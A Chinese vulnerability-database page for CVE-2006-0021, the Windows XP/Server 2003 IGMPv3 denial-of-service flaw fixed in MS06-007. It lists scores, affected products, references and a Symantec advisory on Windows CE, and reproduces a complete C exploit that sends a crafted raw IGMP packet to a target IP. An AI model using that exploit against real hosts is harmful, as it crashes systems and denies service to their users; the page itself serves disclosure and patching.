CVE-2006-0021
CVSS7.8
发布时间 :2006-02-14 14:06:00
修订时间 :2011-03-07 00:00:00
NMCOEPS    

[原文]Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability."


[CNNVD]Microsoft Windows畸形IGMPv3报文远程拒绝服务漏洞(CNNVD-200602-199)

        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的TCP/IP协议栈在处理IGMPv3报文时存在问题,远程攻击者可以利用此漏洞对主机执行远程拒绝服务攻击。Microsoft Windows在实现TCP/IP时没能正确的处理特制的IGMP报文,未经认证的远程攻击者可以通过向有漏洞系统发送带有无效IP选项的特制IGMP报文导致系统失去响应。可以通过单播或多播发送IGMP报文,因此如果没有执行合适的网络过滤的话在很多设备上单包即可触发这个漏洞。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2003_server:standard:sp1
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_xp::sp2:media_centerMicrosoft windows xp_sp2 media_center
cpe:/o:microsoft:windows_xp::sp1:embeddedMicrosoft windows xp_sp1 embedded
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_xp:::embedded
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:microsoft:windows_2003_server:web:sp1
cpe:/o:microsoft:windows_2003_server:datacenter_64-bit:sp1
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:r2:sp1
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2003_server:enterprise:sp1
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:678TCP/IP IGMP v3 Denial of Service (Server 2003,SP1)
oval:org.mitre.oval:def:1662TCP/IP IGMP v3 Denial of Service (XP,SP1)
oval:org.mitre.oval:def:1647TCP/IP IGMP v3 Denial of Service (64-bit XP,SP1)
oval:org.mitre.oval:def:1425TCP/IP IGMP v3 Denial of Service (XP,SP2)
oval:org.mitre.oval:def:1310TCP/IP IGMP v3 Denial of Service (Server 2003)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0021
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0021
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-199
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(VENDOR_ADVISORY)  CERT  TA06-045A
http://www.kb.cert.org/vuls/id/839284
(VENDOR_ADVISORY)  CERT-VN  VU#839284
http://www.securityfocus.com/bid/16645
(PATCH)  BID  16645
http://www.microsoft.com/technet/security/bulletin/ms06-007.mspx
(VENDOR_ADVISORY)  MS  MS06-007
http://secunia.com/advisories/18853
(VENDOR_ADVISORY)  SECUNIA  18853
http://xforce.iss.net/xforce/xfdb/24489
(UNKNOWN)  XF  win-igmpv3-dos(24489)
http://www.vupen.com/english/advisories/2006/0576
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0576
http://www.securityfocus.com/archive/1/archive/1/482658/30/4350/threaded
(UNKNOWN)  BUGTRAQ  20071023 SYMSA-2007-012: Microsoft Windows CE IGMP Denial of Service
http://www.securiteam.com/exploits/5PP0T0KI0O.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5PP0T0KI0O.html
http://www.milw0rm.com/exploits/1599
(UNKNOWN)  MILW0RM  1599
http://securitytracker.com/id?1015629
(UNKNOWN)  SECTRACK  1015629

- 漏洞信息

Microsoft Windows畸形IGMPv3报文远程拒绝服务漏洞
高危 设计错误
2006-02-14 00:00:00 2006-04-19 00:00:00
远程  
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的TCP/IP协议栈在处理IGMPv3报文时存在问题,远程攻击者可以利用此漏洞对主机执行远程拒绝服务攻击。Microsoft Windows在实现TCP/IP时没能正确的处理特制的IGMP报文,未经认证的远程攻击者可以通过向有漏洞系统发送带有无效IP选项的特制IGMP报文导致系统失去响应。可以通过单播或多播发送IGMP报文,因此如果没有执行合适的网络过滤的话在很多设备上单包即可触发这个漏洞。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

- 漏洞信息 (1599)

MS Windows XP/2003 (IGMP v3) Denial of Service Exploit (MS06-007) (EDBID:1599)
windows dos
2006-03-21 Verified
0 Alexey Sintsov
N/A [点击下载]
/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx


        by Alexey Sintsov (dookie@inbox.ru)


        Req:

                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <winsock2.h>


#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{

        unsigned char  verlen;                  // IP version & length
        unsigned char  tos;                             // Type of service
        unsigned short total_len;               // Total length of the packet
        unsigned short ident;                   // Unique identifier
        unsigned short frag_and_flags;  // Flags
        unsigned char  ttl;                             // Time to live
        unsigned char  proto;                   // Protocol (TCP, UDP etc)
        unsigned short checksum;                // IP checksum
        unsigned int   sourceIP;                // Source IP
        unsigned int   destIP;                  // Destination IP
        unsigned short  options[2];

} IPHEADER;




typedef struct igmphdr {
          unsigned char                 type;
          unsigned char                 code;
                  unsigned short        checksum;
                  unsigned long                 group;
                  unsigned char                 ResvSQVR;
                  unsigned char                 QQIC;
                  unsigned short                num;
                  unsigned long                 addes;

 } IGMPHEADER;






USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size  -= sizeof(USHORT);
    }

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{


        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;



        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);


        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }


        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) ==
SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }



        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);
        ssin.sin_addr.s_addr=dst_addr;


        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));


        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));


        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;


        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);


        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;
        igmpHeader.num=htons(1);
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");
        igmpHeader.addes=dst_addr;

        igmpHeader.checksum=0;


        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf,
sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));


        rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }



        closesocket(sock);
        WSACleanup();



return 1;


}



main(int argc, char **argv)
{


        if(argc<2)
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                exit(0);
        }


        sendIGMP(argv[2],  argv[1]);


        return 0;
}

// milw0rm.com [2006-03-21]
		

- 漏洞信息 (F60332)

SYMSA-2007-012.txt (PacketStormID:F60332)
2007-10-23 00:00:00
Ollie Whitehouse  symantec.com
advisory,denial of service
windows,ce
CVE-2006-0021
[点击下载]

Symantec Vulnerability Research SYMSA-2007-012 - Microsoft Windows CE suffers from a IGMP related denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                     Symantec Vulnerability Research
                     http://www.symantec.com/research
                           Security Advisory

   Advisory ID: SYMSA-2007-012
Advisory Title: Microsoft Windows CE IGMP Denial of Service
        Author: Ollie Whitehouse / ollie_whitehouse@symantec.com
  Release Date: 22-10-2007
   Application: Windows CE 5.01 / Windows Mobile 5
      Platform: Microsoft Windows
      Severity: Denial of Service
 Vendor status: Update Available
    CVE Number: CVE-2006-0021
     Reference: http://www.securityfocus.com/bid/16645


Overview:

  This issue was originally discovered by Douglas Nascimento of
  Datacom and published in Microsoft security bulletin MS06-007 on
  Feburary 14th 2006 and subsequently updated March 17th 2006. A
  condition exists with the Microsoft IP stack wherein a specially
  crafted IGMP packet causes a denial of service condition. In
  Microsoft's original advisory, Windows CE was omitted as a
  vulnerable platform; however, In Symantec's testing it was
  discovered that Windows CE 5.01 (shipped as part of the Windows
  Mobile 5 PocketPC and SmartPhone editions) is vulnerable. Symantec
  notified Microsoft in Feburary 2006 of the fact that CE was
  affected with Microsoft releasing a patch in KB930642 in
  Feburary 2007.


Details:

  On the day of release Symantec developed a working trigger for this
  vulnerability. A public exploit for this issue was released by
  Alexey Sintsov on the 21st of March 2006. When an IGMP packet is
  supplied with invalid IP options then it will cause a denial of
  service condition. As IGMP can be sent both via unicast and mulicast
  it is possible to cause the issue to manifest itself in many devices
  with a single packet if appropiate network filtering is not in place.


Vendor Response:

  There is a security vulnerability that could allow for Denial of
  Service (DoS) by sending a specifically crafted TCP/IP packet to the
  mobile device. However most attempts to exploit this vulnerability
  would result in a Denial of Service Condition on the networking
  capabilities of the device.
  
  The following devices may be vulnerable to this issue:
  
  Windows CE 4.2 - Windows CE .NET 4.2 Platform Builder
      Monthly Update (September 2007)
  Windows Mobile 5.0 - A fix for this issue has been provided by
      Microsoft via  http://support.microsoft.com/kb/930642
  Fixed in Windows Mobile 6.0.


Recommendation:

  Windows Mobile 5.0 customers please see your handset manufacturer to
  obtain the update customized for your device to Windows Mobile 6.

  OEMs which utilise Windows CE should ensure KB930642 is applied to
  their build environment. Details can be found here on Microsoft's
  support site - http://support.microsoft.com/kb/930642/.

  Carriers should ensure appropiate network filtering is in place in
  order to protect affected handsets.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


  CVE-2006-0021

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research@symantec.com

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure@symantec.com 

For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from research@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHHUm2uk7IIFI45IARAusBAJ9C0DNcJwYpQgwriJ7kMeK7mHPGEACfUS6G
z6cX6HZtfiCvZQx9KWKER0U=
=yRi5
-----END PGP SIGNATURE-----
    

- 漏洞信息

23133
Microsoft Windows IGMPv3 Crafted Packet Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-02-14 Unknow
2006-03-21 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows IGMPv3 Denial of Service Vulnerability
Design Error 16645
Yes No
2006-02-14 12:00:00 2007-10-25 02:26:00
Douglas Nascimento of Datacom is credited with the discovery of this vulnerability. This issue was disclosed in the referenced vendor advisory.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition

- 漏洞讨论

A vulnerability in the handling of IGMPv3 (Internet Group Management Protocol) packets could result in a denial of service.

An attacker can exploit this issue through a broadcast attack to cause vulnerable computers on the subnet to become unresponsive, effectively denying service to legitimate users.

- 漏洞利用

An exploit is not required.

Proof-of-concept code is available.

- 解决方案

Microsoft has released security advisory MS06-007 with fixes to address this issue.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows XP Media Center Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows XP Professional

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows XP Tablet PC Edition

Microsoft Windows XP Professional SP1

Microsoft Windows XP 0

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站